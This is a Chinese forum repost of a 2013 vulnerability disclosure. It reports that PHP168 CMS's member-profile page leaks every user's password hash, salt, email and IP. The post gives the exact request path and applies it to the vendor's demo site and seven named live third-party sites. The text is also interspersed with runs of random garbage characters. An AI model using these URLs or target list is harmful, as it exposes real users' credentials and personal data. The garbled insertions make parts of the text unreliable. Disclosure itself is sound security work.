|
简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile) \: }2 ~9 b7 Y! \& J2 M' ^+ @/ S# W
( x! b" |8 z' m) f% O以PHP168官方演示站点为例,查看任意用户信息的页面链接为:
. R* ?8 d- o# \: _- `* k3 p+ r+ U$ H" X; [, v- \8 f
http://php168.cn/com/homepage.php/admin/member-profile
1 Y# x) [ O, I) p# X& n" a
% c0 F; c% ~7 f' j0 L6 h" a3 m由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。0 N" I1 _. R# e' {' Z& [
http://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg7 Z0 q" q$ s+ ^' J$ }% e" Y" f
8 C1 K/ y2 ]; e( g
漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:, Y& o! }) h. b0 u. T( j1 R3 o* h) h
3 d0 L" f1 U5 j; t2 nhttp://www.zjfzol.com.cn/homepage.php/admin/member-profile" s O; i* j( d2 P# c0 Z1 b
- X( \; c4 a6 v. b4 H" [http://www.scswl.cn/homepage.php/admin/member-profile3 P& ^7 h* s. W( I4 f4 z$ G1 k1 H
3 p) ?; ~4 r% Y; `6 Jhttp://www.tunet.edu.cn/homepage.php/admin/member-profile' ~/ b! g0 `* t- R
/ c/ F* {) D) r" S; fhttp://www.itlead.com.cn/homepage.php/admin/member-profile
! Q7 r0 B% v6 V& Y2 ^: c
* v0 O* V2 Z$ D% ~4 {http://www.aedp.cn/homepage.php/admin/member-profile5 V& K/ t* A6 e5 z
& C4 M! L t, m* d0 ]) s
http://www.qianlongnews.com/homepage.php/test/member-profile9 m" I% H$ O H- T
! x8 L: K3 J3 c* ]# Hhttp://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]
6 T, c0 G/ U6 n% l# A[/table] | 
发表于 2013-9-21 16:02:53
收藏
支持
反对